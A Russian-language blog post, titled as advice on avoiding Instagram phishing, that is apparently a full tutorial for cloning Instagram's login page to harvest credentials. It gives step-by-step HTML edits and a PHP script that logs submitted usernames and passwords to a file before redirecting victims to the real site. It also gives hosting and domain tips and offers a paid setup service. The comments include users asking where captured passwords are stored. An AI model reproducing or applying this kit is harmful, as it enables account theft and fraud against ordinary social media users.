Как не попасть на фишинг в Инстаграм
Привет. Сегодня я поделюсь своей методикой по созданию фишингового сайта инстаграм. Чтобы вы понимали, что это такое и как избежать попадания вас на такой сайт =) Объясню, что такое фишинг, зачем их создают. После этого вы самостоятельно сможете создать фейковую страницу в instagram бесплатно. Если вам лень читать и вообще вы ничего не понимаете. Тогда вы можете заказать эту услугу у меня, все подробности будут в конце этой статьи.
Я уже рассказывал в предыдущих статьях как создавать фишинг ВК и в одноклассниках. Если у вас есть потребность еще в каком-то сайте, то можете написать об этом в комментариях, либо мне в скайп, контакты будут в конце статьи. Погнали.
Что такое фишинговый сайт?
Сайт с помощью, которого можно украсть данные пользователя. Создавать такие сайты можно, а вот пользователя нежелательно, вам же самим будет не приятно, если у вас кто-то уведёт вашу страницу в инстаграм? Вот и другим людям так же будет не приятно. Разве, что использовать такую страницу ради шутки, дабы разыграть друга или подруги. По этому читаем, вникаем и не попадаемся на удочку мошенников.
Как можно защититься от фишинга
Все очень просто. Перед тем как вводить логин, и пароль смотрите на адресную строку. Если это будет фишинговый сайт, то адрес будет отличаться от официального ресурса. Для примера я создал фишинговый сайт инстаграм, обратите внимание на адрес сайта.
Адрес сайта полностью отличается от официального сайта инстаграм, хотя все остальное выглядит как на официальном сайте. Самый проверенный способ сберечь свой логин и пароль — это обращать внимание на адрес сайте. Попробуйте ввести любые данные в поле логин и пароль, после того как нажмете на кнопку войти, вас перекинет на официальный сайт инстаграм. Посмотреть, то что вы ввели можно тут.
Не вводите свой настоящий логин и пароль, иначе его будут знать все посетители моего портала.
Что будет, если ввести свои данные на фишинговом сайте?
Ну тут как бы все очевидно, вы лишитесь своего аккаунта. Восстановить его крайне трудно. Если у вас там еще и фейковый номер был привязана или доступ к номеру телефона утерян, то вообще ни как не восстановите. Так что будьте бдительны.
Создание фишинг сайта инстаграм
Заходим на официальный сайт инстаграм. Затем если делать в браузере хром, то нажимаем три точки в верхнем правом углу, дальше выбираем из контекстного меню «дополнительные настройки», а затем «сохранить страницу как».
После чего появится диалоговое окно, о том куда сохранить файлы, сохраняем все на рабочий стол в название пишем «index.html».
После чего у вас на рабочем столе появится файл «index.html» и папка «index_files». Теперь с помощью блокнота открываем файл, нажимаем комбинацию клавиш «ctrl+f» и ищем кусок кода:
<input aria-label=”Номер телефона, имя пользователя или эл. адрес” aria-required=”true” autocapitalize=”off” autocorrect=”off” maxlength=”75″ name=”username”
Меняем на:
<input aria-label=”Номер телефона, имя пользователя или эл. адрес” aria-required=”true” autocapitalize=”off” autocorrect=”off” maxlength=”75″ name=”1″
Чуть ниже поищите этот кусок кода:
<input aria-label=”Пароль” aria-required=”true” autocapitalize=”off” autocorrect=”off” name=”password”
И замените его на этот кусок:
<input aria-label=”Пароль” aria-required=”true” autocapitalize=”off” autocorrect=”off” name=”2″
Дальше найдите этот кусок кода и удалите его полностью:
<script type=”text/javascript”>(function() {if (‘PerformanceObserver’ in window && ‘PerformancePaintTiming’ in window) {…
тут большой кусок кода
…} else {console.error(‘Unexpected additional data encountered an error “‘ + path + ‘”: ‘ + msg);}};})();</script>
Теперь нужно сделать, так чтобы кнопка «войти» стала активной, для этого найдите этот кусок кода:
<button class=”sqdOP L3NKy y3zKF ” disabled=”” type=”submit”>
Замените на:
<button class=”sqdOP L3NKy y3zKF ” type=”submit”>
Если нажать на файл «Index.html», то откроется страничка авторизации в инстаграм. Вроде все хорошо, но нет лотипа инстаграм, сейчас мы его восстановим. Для это зайдите в папку «index_files» там найдите файл «aed056af0369.css» и откройте его в блокноте. Ищем по тексту «/static/» и вставляем перед ним «https://www.instagram.com», чтобы получилось «https://www.instagram.com/static/…» . Это нужно сделать в 16-ти местах. После этих телодвижений логотип у вас появится.
Если начать вводить логин и пароль, то увидим, что текст накладывается на текст поля, чтобы это исправить необходимо сделать следующее. Открываем файл «Index.html» и там найти кусок этого кода:
<label class=”f0n8F “><span class=”_9nyy2”>
И заменить его на этот кусок кода:
<label class=”f0n8F “><span class=”_9nyy2” style=” transform: scale(.83333) translateY(-10px); ” >
Обратите внимание, что менять нужно в двух местах.
В этом же файле найдите строчку:
<form class=”HmktE” method=”post”>
Замените её на следующий код:
<form class=”HmktE” action=”icq.php” method=”post”>
Все правки в этом файле мы закончили, поехали дальше.
Создаем еще один файл на рабочем столе с названием «icq.php», открываем его блокнотом и внутрь копируем этот код.
<?
$Login = $_POST[‘1’];
$Pass = $_POST[‘2′];
$log = fopen(“ups.html”,”a+”);
fwrite($log,”Логин =$Login <br> Пароль =$Pass <br>”);
fclose($log);
echo “<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=https://www.instagram.com/’></head></html>”;
?>
После чего все эти два файла и одну папку нужно залить себе на хостинг. Этот хостинг дает возможность пользоваться им бесплатно целый месяц, вам вполне хватит времени на все тесты. Также вам там нужно будет придумать имя для бесплатного домена третьего уровня или купить домен второго уровня. Там если оплачиваешь хостинг, то домен второго уровня дается в подарок.
- Домен третьего уровня: warninf.27sysday.ru
- Домен второго уровня: 27sysday.ru
Вы можете скачать архив с инструкцией — как взломать страницу инстаграм – фишинг страница instagram бесплатно на моем портале,
Рассказ о том как залить все это дело на хостинг
Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе: https://vk.com/27sysday
В связи с большим количеством обращений, решил создать услугу по настройке.
- Статья про фишинг в ВК.
- Статья про фишинг в Одноклассниках.
Что понадобится
- Вам нужно зарегистрироваться https://beget.com
- Связать со мной в телеграм.
- Сказать мне логин и пароль.
- Пополнить баланс телефона на 1500 рублей (тел. скажу в скайпе).
- Через час после оплаты, получите готовое решение.
Спасибо
спасибо помогли
Все работает,я офигел!
как вы сделали
Можно у вас попросить ссылку пожалуйста, а вы скинете мне пароль, не получается изменить код, там вообще не ищет такие участки)
КАК У ВАС ПОЛУЧИЛОСЬ?
Пои инструкции у него получилось
ребята, то есть с помощью этой странички можно взломать желаемого человека?
Получить его пароль и логин, но это не законно!
в смвсле как работает?? у меня не работает что за хрень
А где пароль и логин, где они сохраняются?
Прочтите статью более внимательно и все поймете
Здравствуйте . Можно ли узнать пользователя который пользовался вашей подставной ссылкой . https://27sysday.ru/warning/inst/ . Меня пытались фишинговать
Здравствуйте. Нет нельзя, эта статья чисто в ознакомительных целях была создана, и вы догадались же что вас фишингуют, все хорошо не взломали?
У меня в папке index_files нет файла ”aed056af0369.css”
Он может называть по другому, главное расширение css
Там не написанно где буду храниться пароли
Написано, читайте внимательно. Вот выдержка из текста “Посмотреть, то что вы ввели можно тут.”
А как ты отправишь смс обидчику????
Зачем?
Либо я что-то неправильно делаю(хоть я и сделал все по инструкции), либо там что-то обновилось, но у меня нет ни логотип инстаграмма, ни порядка как на официальной странице, будто все взяли и запихнули без флексов и align”ов, даже не смотря на то что я во всех файлах с .css к каждому /static/ приписал “https://instagram.com/”.
у меня тоже самое, шо делать? о_о
Пожалуйста помогите я все сделалаа просто не могу найти где сохраняются пароль и логин . Помогите срочно
Я все уже сделала вроде правильно не не могу найти где сохраньяются пароль логин . Ответьте пожалуйста
жаль что щас посмотреть пароли нельзя
А почему нельзя смотреть?
можно
что за ошибка возникающея при нажимании кнопки войти?
и интерисует строки
етот типо нужно заменить
на етот
хоть в описании нету вставки loginForm
Источник: https://27sysday.ru/xaki/fishing-instagram
не обнаружена
Запрошенный URL-адрес /â€??icq.php†?? не был найден на этом сервере.
Сервер Apache / 2.4.10 (Unix) на порту 80 volody9h.beget.tech
а где в данный момент можно посмотреть пароли?
На каком фейле хранятся пароли?
На каком файле хранятся пароли?
ups.php
как найти код
А что если у меня куча файлов в формате css какой мне нужен?
При написание кода я не могу найти код <input aria-label=”Пароль” aria-required=”true” autocapitalize=”off” autocorrect=”off” name=”password”
жду ответа Admina
Ищите по другому, просто input или пароль
нету Файла CSS вообще) да и удалил строки(КОДЫ) Сверху сайта много кодов…. как пофиксить?
Вроде как за такие шалости могут посадить нехило. Потому как сначала ради прикола, потом ради выгоды. Обидно будет!
Я не знаю что я не так сделал, но на фишинг сайте все в разброс. Очень неприятно 🙁 Надеюсь на помощь админа
Есть страница в Инстаграм?
Телеграм точнее
есть, в статье указана
что бы фишиновать обязательно знать эл почту и номер?
Здраствуйте! Меня заинтересовало ваши предложения. Как можно с вами связаться в телеграмм?
Очень круто
Кто понял где храняться пароли?